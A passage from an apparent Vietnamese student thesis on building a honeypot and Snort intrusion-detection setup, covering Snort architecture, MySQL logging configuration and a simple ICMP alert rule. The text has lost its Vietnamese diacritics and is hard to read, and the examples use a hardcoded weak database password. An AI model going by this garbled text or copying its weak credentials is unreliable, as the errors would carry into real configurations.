my honeywall. y, Mac ca honeywall nhm to l :
00:0C:29:25:5E:E7
bt u ci t Sebek client, dng lnh :
sudo ./sbk_install.sh

Gi sebek client c ci t thnh cng trn my honeypot.
2. H thng NI DS
Ta bit NIDS l mt phn loi ca h thng IDS vi chc nng gim st
hot ng trn ton mng vi nhiu host khc nhau.
Snort l mt NIDS c pht trin bi Martin Roesch, l phn mm m ngun
m, min ph v d s dng vi nhiu tnh nng. Snort c th trin khai trn
nhiu h iu hnh khc nhau nh Windows, Linux, MacOS, nh v c tnh
33
ty bin cao, n c th pht hin lin tc cc xm nhp bt hp php vo h
thng.
Snort c ci t trn mng lm nhim v gim st nhng gi tin ra vo
h thng. Khi pht hin mt cuc tn cng, snort s gi cnh bo cho nh qun
tr, hoc ngn chn, loi b gi tin ph thuc vo cu hnh m n c
thit lp. Snort s dng cc rule pht hin ra cc hot ng xm nhp, khi
trng vi mt trong cc rule, Snort s nh ngha l mt cuc tn cng v
phn ng vi gi tin . Mi rule tng ng vi mt phng php tn cng.
File cu hnh chnh ca snort l snort.conf.
Snort c th c cu hnh chy ch :
Sniffer (snort v): lng nghe gi tin trn mng, sau gii m v
hin th chng ln mn hnh console.
Packet Logger (snort l /var/log/snort): gi tin sau khi gii m s
c ghi log vo tp tin c cu trc nh phn hoc ASCII.
NIDS (snort c /etc/snort/snort.conf I eth0) : Snort p dng cc
rule vo tt c cc gi tin bt c. Sau so snh v a ra nhng
hnh ng tng ng.
Inline: nhn cc gi tin t iptables, sau so snh vi rule v thng
bo cho iptables x l cc gi tin (cho php allow hoc b qua
deny).
1.1 Nghin cu ng dng Snort
1.1.1 Kin trc ca Snort
Snort gm nhiu thnh phn lm vic cng vi nhau pht hin
ra mt cuc tn cng c th, mi thnh phn logic c mt nhim v khc
nhau.
34

M hnh kin trc ca Snort
Packet decoder (Gii m gi tin) : Khi snort hot ng, n s
thc hin bt mi gi tin no di chuyn, lu thng qua h
thng. B phn ny s xc nh giao thc no ang c dng
da vo card mng v dy dn, Mt gi tin sau khi c gii
m s a tip vo giai on tin x l
Snort s cnh bo khi n pht hin ra nhng header khng ng
cu trc, bt thng.
Pre-processors (Tin x l): giai on ny, Pre-processors c
ba nhim v chnh :
- Kt hp li cc gi tin : khi mt gi tin gi i c
kch thc ln, gi tin s c phn mnh thnh
nhiu gi vi kch thc nh hn, giai on ny s
ghp ni cc gi tin li thnh gi nguyn ven ban
u
- Gii m v chun ha giao thc :
-

Detection engine (Pht hin) : cc gi tin sau khi c x l
b phn pre-processors, s tip tc c a qua qu trnh
detection y l qu trnh quan trng nht ca Snort. y,
cc gi tin s c so snh vi rule xem gi tin c hp l
35
hay khng, c cha nhng ni dung vi mc ch tn cng
c nh ngha trong rule hay khng.
Detection engine cng c th tch cc phn ca gi tin ra v p
dng rule ln tng phn ca gi tin .
Mt IDS c th s c nhiu rule v thng n cng nhn c
rt nhiu gi tin lu thng vo h thng, khi thng lng mng
qu ln, c th xy ra hin tng b st gi tin hoc phn hi
khng nhanh chng, l mt trong nhng im yu ca vic x
l pht hin gi tin.
Logging and Alerting System (Ghi nhn v cnh bo): sau qu
trnh detection, nu pht hin xm nhp, gi tin s c a
tip vo log/alerting, kt qu s c ghi li thnh log v sau
xut thng bo cho h thng hoc ngi qun tr, cc file log l
cc file text d liu.
Output Module : s thc hin cc thao tc lu kt qu xut ra
khc nhau, ty thuc vo cu hnh h thng, c th ghi file log,
ghi cnh bo vo c s d liu, hoc to file log dng xml
1.1.2 Cc lut ca Snort :
Cc lut ca Snort (rule) c to ra da vo nhng thng
tin, du hiu t cc hnh ng xm nhp.
Rule c th c cp nht t trang ch ca snort
www.snort.org , hoc ngi dng c th t nh ngha rule,
pht trin rule ty vo mc ch s dng ca mi ngi.
Rule l phn ct li ca h thng IDS c th nhn bit
cc cuc tn cng vo h thng.

1.1.3 Ch ngn chn Snort (Snort-Inline)
Snort Inline l mt nhnh pht trin ca snort do William
Metcalf

36

1.2 Xy dng m hnh mng chi tit cho h thng

M hnh trin khai Snort (Single Snort Sensor)
1.3 Trin khai, ci t v vn hnh Snort (cu hnh rules, to CSDL snort..)
a. Trin khai h thng:
Trin khai h thng theo m hnh trn (Hnh: )
My hacker c a ch ip l: 10.0.0.50 c ci t sn nhng
chng trnh h tr cho tn cng nh: nmap, hping3
My Web server c a ch ip 10.0.0.10
My Snort server khng c a ch ip trong sut vi hacker
b. Ci t Snort
Ln lt ci t cc gi: Snort, mysql-server, snort-mysql (s dng apt-
get)
To c s d liu cho Snort vi Mysql
Bc 1: Login vo mysql
#mysql u root p
37
Bc 2: To user cho snort
mysql>use mysql;
mysql>CREATE USER snort@localhost IDENTIFIED BY 123456;
Bc 3: To c s d liu cho snort
mysql>Create database snort;
mysql>Grant all on snort.* to snort@localhost;
mysql>flush privileges;
mysql>exit;
Bc 4: To tables cho database Snort
(Chuyn ti th mc cha bng. V d: cd /usr/share/doc/snort-mysql)
#zcat create_mysql.gz | mysql u snort p
Bc 5: Kim tra li
#mysql u root p
mysql>show databases;

mysql>use snort;
mysql>show tables;

+------------+
| Database
+------------+
| mysql
| snort
| test
+------------+

38

Cu hnh Snort
File cu hnh: /etc/snort/snort.conf
-Thay i i ch HOME_NET v EXTERNAL_NET
var HOME_NET 10.0.0.0/24
var EXTERNAL_NET !$HOME_NET
-Thay i ng dn ti th mc rules
var RULE_PATH /etc/snort/rules
-thay i tn c s d liu
output database: alert, mysql, user=snort password=123456 dbname=snort
host=localhost

+------------------+
| Tables_in_snort
+------------------+
| data
| detail
| encoding
| event
| flags
| icmphdr
| iphdr
| opt
| protocols
| reference
| reference_system
| schema
| sensor
| services
| sig_class
| sig_reference
| signature
| tcphdr
| udphdr
+------------------+ +---

39
Khi ng dch v
#Services mysql restart
#Services snort restart
c. Vn hnh snort
To rule n gin kim tra snort
-To tp tin test.rules trong th mc cha rule:
#touch /etc/snort/rules/test.rules
-Thm dng alert icmp any any ->any any(msg: Co nguoi dang ping;
ttl: 64; sid: 1000) vo test.rules
-Thm dng: include $RULE_PATH/test.rules trong snort.conf
-Khi ng li dch v: #Services snort restart
Khi ng snort ch cnh bo trn console
#Snort -A console c /etc/snort/snort.conf l /var/log/snort/alert
Tin hnh ping t my hacker n my webserver (theo Hinh: )
Kt qu:

40
KT LUN V HNG PHT TRIN
IDS l gii php bo mt c b sung cho Firewall. Mt IDS c kh nng pht
hin ra cc on m c hot ng k c trong h thng mng ni b v Honeypot l
mt h thng gi dng nh la hacker, bo v h thng tht an ton trc nhng
nguy c ph hoi.
Trin khai hai h thng IDS v honeypot, to ra mt h thng mng kt hp,
mt mt nh la hacker nhm bo v h thng tht, ng thi ghi li log (thng tin
hacker, kiu tn cng, cng c tn cng), mt mt pht sinh mu cho h thng IDS
lm du hiu trnh c cc phng php tn cng ny nhng ln sau, l mt
phng php bo mt em li hiu qu cao v thc s cn thit cho h thng mng
my tnh, gip h thng hot ng n nh v khc phc s c mt cch nhanh nht.
Qua thi gian tm hiu v thc hin n vi ti Pht sinh mu cho h
thng pht hin xm nhp nhm t c mt s mc tiu :
Nm vng c khi nim, phn loi, chc nng ca h thng pht hin
xm nhp IDS, hiu c c ch hot ng ca IDS.
Nm r khi nim, phn loi, chc nng v cc bc hot ng ca h
thng HoneyPot.
Cch ci t, trin khai, vai tr ngha ca Honeynet m hnh tng
tc cao ca Honeypot.
p dng cc log Honeypot bt c pht sinh mu (signature) cho
h thng pht hin xm nhp, to cc cnh bo cho h thng khi c tn
cng.
Vic s hu mt h thng IDS tt, to nhng cnh bo chnh xc v pht hin
ra cc cuc tn cng kp thi cn i hi ngi qun tr phi c nhng k nng cp
nht v pht trin cc Rule cho h thng, m bo h thng c an ton v n nh.
Tuy nhin, vic pht trin Rule bng tay mt cch th cng c th mang li nhiu sai
st, khng em li hiu qu cao. V vy, vic t chc, thit k cc Rule c th t
ng cp nht vo h thng IDS, pht sinh mu cho h thng pht hin xm nhp IDS
mt cch t ng l cn thit, hiu qu hn cho an ton h thng, cng chnh l hng
pht trin sau ny ca n, i hi vic kt ni gia IDS v honeywall ca honeynet
41
mt cch cht ch hn, lin kt hn, m bo vic pht sinh t ng, chnh xc v an
ton.

42
TI LIU THAM KHO
1. 109802808-Do-an-Honeypots-001
2. Addison-Wesley Professional.Honeypots- Tracking Hackers
3. Snort_2.9.1_CentOS
4. OReilly--Managing_Security_with_Snort_and_IDS_Tools
5. SaudiHoneynet-UserManual
6. http://seat.massey.ac.nz/projects/honeynet/honeynet.htm
7. http://www.symantec.com/connect/articles/sebek-3-tracking-
attackers

Phat Sinh Mau Cho He Thong Phat Hien Xam Nhap

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Phat Sinh Mau Cho He Thong Phat Hien Xam Nhap

Uploaded by

Copyright:

Available Formats

n 2 : Pht sinh mu cho h thng pht hin xm nhp

You might also like